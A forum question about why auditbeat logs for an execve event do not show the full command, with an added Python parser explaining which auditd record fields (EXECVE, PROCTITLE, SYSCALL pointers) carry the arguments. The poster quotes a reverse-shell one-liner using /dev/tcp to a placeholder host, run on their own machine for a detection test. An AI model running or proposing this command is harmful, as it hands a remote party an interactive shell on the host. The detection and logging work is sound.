How to interpret the auditd.data.a fields

I am trying to decode the arguments of syscalls which I have in "execve" logs.
As these a0 to a3 fields are supposed to be encoded in hexadecimal, I've tried to decode them to find out the args of the process, but couldn't catch anything.
In auditd, the "ausearch" utility would do the task, or using "xxd -r -p" on the raw log of it, but here in auditbeat I can't find the way to decode the args.
Here is the example I have.
I ran this command on my host:
bash -i &> /dev/tcp/myvps/6666 0>&1

But I only have these fields parsed in Kibana:
process.args: bash, -i
process.title: bash -i
and the event.original of it is:
type=SYSCALL msg=audit(1585588280.744:216616): arch=c000003e syscall=59 success=yes exit=0 a0=55ec60a91300 a1=55ec60b2e0a0 a2=55ec609c6a50 a3=7f7337c74cc0 items=2 ppid=1353 pid=1969 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=2746 comm="bash" exe="/bin/bash" key="exec", type=EXECVE msg=audit(1585588280.744:216616): argc=2 a0="bash" a1="-i", type=CWD msg=audit(1585588280.744:216616): cwd="/home/kasra", type=PATH msg=audit(1585588280.744:216616): item=0 name="/bin/bash" inode=219 dev=fc:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0, type=PATH msg=audit(1585588280.744:216616): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=fc:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0, type=PROCTITLE msg=audit(1585588280.744:216616): proctitle=62617368002D69
There isn't any detail about the rest of the args: &> /dev/tcp/myvps/6666 0>&1

I would appreciate any help in this case.
auditbeat version: 7.5

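Added example (not part of the original post, and not auditbeat or auditd code): a small parser for the event.original line above that shows what each record actually carries. The SYSCALL record's a0..a3 are the raw register values of the syscall; for execve (syscall=59 on arch=c000003e, x86_64) those are the user-space addresses of filename, argv and envp, so hex-decoding them can only ever give you pointers, never the argument strings. The strings live in the EXECVE record (quoted, or hex-encoded when they contain spaces, quotes or control characters) and in PROCTITLE (hex, with NUL separating the arguments). The redirections "&> /dev/tcp/myvps/6666 0>&1" are performed by the invoking shell before it calls execve and are never part of the new process's argv, which is why none of the records contain them. The second sample record with a hex-encoded argument is constructed for illustration.

```python
"""Decode auditd SYSCALL / EXECVE / PROCTITLE records as auditbeat stores them
in event.original (added example, not auditbeat's own code)."""
import re

# Sample input taken from the post, trimmed to the relevant fields.
SAMPLE = (
    'type=SYSCALL msg=audit(1585588280.744:216616): arch=c000003e syscall=59 '
    'success=yes exit=0 a0=55ec60a91300 a1=55ec60b2e0a0 a2=55ec609c6a50 '
    'a3=7f7337c74cc0 items=2 ppid=1353 pid=1969 auid=1000 uid=1000 '
    'comm="bash" exe="/bin/bash" key="exec", '
    'type=EXECVE msg=audit(1585588280.744:216616): argc=2 a0="bash" a1="-i", '
    'type=CWD msg=audit(1585588280.744:216616): cwd="/home/kasra", '
    'type=PROCTITLE msg=audit(1585588280.744:216616): proctitle=62617368002D69'
)

# Constructed record: auditd hex-encodes an argument instead of quoting it
# when the argument contains whitespace, quotes or control characters.
SAMPLE_HEX_ARG = ('type=EXECVE msg=audit(1.000:1): argc=3 '
                  'a0="sh" a1="-c" a2=6563686F2068656C6C6F')

_KV = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')

# execve(2) register arguments on x86_64: arch=c000003e, syscall=59.
EXECVE_X86_64 = {'arch': 'c000003e', 'nr': '59',
                 'args': ('filename', 'argv', 'envp')}


def split_records(line):
    """Split the comma-joined event.original into one string per audit record."""
    return re.split(r',\s+(?=type=)', line.strip())


def parse_record(record):
    """Turn 'key=value key="quoted value"' into a dict (quotes kept as-is)."""
    return dict(_KV.findall(record))


def decode_value(value):
    """Unquote a quoted audit string, or hex-decode an unquoted one."""
    if value.startswith('"') and value.endswith('"'):
        return value[1:-1]
    if len(value) % 2 == 0 and re.fullmatch(r'[0-9a-fA-F]+', value):
        return bytes.fromhex(value).decode('utf-8', errors='replace')
    return value


def execve_argv(records):
    """argv of the exec'd program, as recorded in the EXECVE record."""
    for rec in map(parse_record, records):
        if rec.get('type') == 'EXECVE':
            return [decode_value(rec[f'a{i}']) for i in range(int(rec['argc']))]
    return None


def proctitle_argv(records):
    """argv from PROCTITLE: hex-encoded bytes with NUL between arguments."""
    for rec in map(parse_record, records):
        if rec.get('type') == 'PROCTITLE':
            raw = rec['proctitle']
            if raw.startswith('"'):          # titles without special chars are quoted
                return raw[1:-1].split(' ')
            title = bytes.fromhex(raw).rstrip(b'\x00')
            return title.decode('utf-8', errors='replace').split('\x00')
    return None


def syscall_pointer_args(records):
    """For an x86_64 execve SYSCALL record, name the a0..a2 register values.
    They are user-space addresses of filename/argv/envp, not their contents,
    so there is nothing to 'decode' into strings here."""
    for rec in map(parse_record, records):
        if rec.get('type') != 'SYSCALL':
            continue
        if (rec.get('arch'), rec.get('syscall')) != (EXECVE_X86_64['arch'],
                                                     EXECVE_X86_64['nr']):
            return None
        return {name: int(rec[f'a{i}'], 16)
                for i, name in enumerate(EXECVE_X86_64['args'])}
    return None


if __name__ == '__main__':
    recs = split_records(SAMPLE)
    print('EXECVE argv   :', execve_argv(recs))
    print('PROCTITLE argv:', proctitle_argv(recs))
    print('SYSCALL ptrs  :', {k: hex(v) for k, v in syscall_pointer_args(recs).items()})
    print('hex-encoded   :', execve_argv(split_records(SAMPLE_HEX_ARG)))
```

Running it on the line from the post gives ['bash', '-i'] from both EXECVE and PROCTITLE and three addresses from SYSCALL; for detection purposes, EXECVE and PROCTITLE are the fields to alert on, and the a-fields of SYSCALL only carry meaning for syscalls whose arguments are scalars (flags, file descriptors, modes).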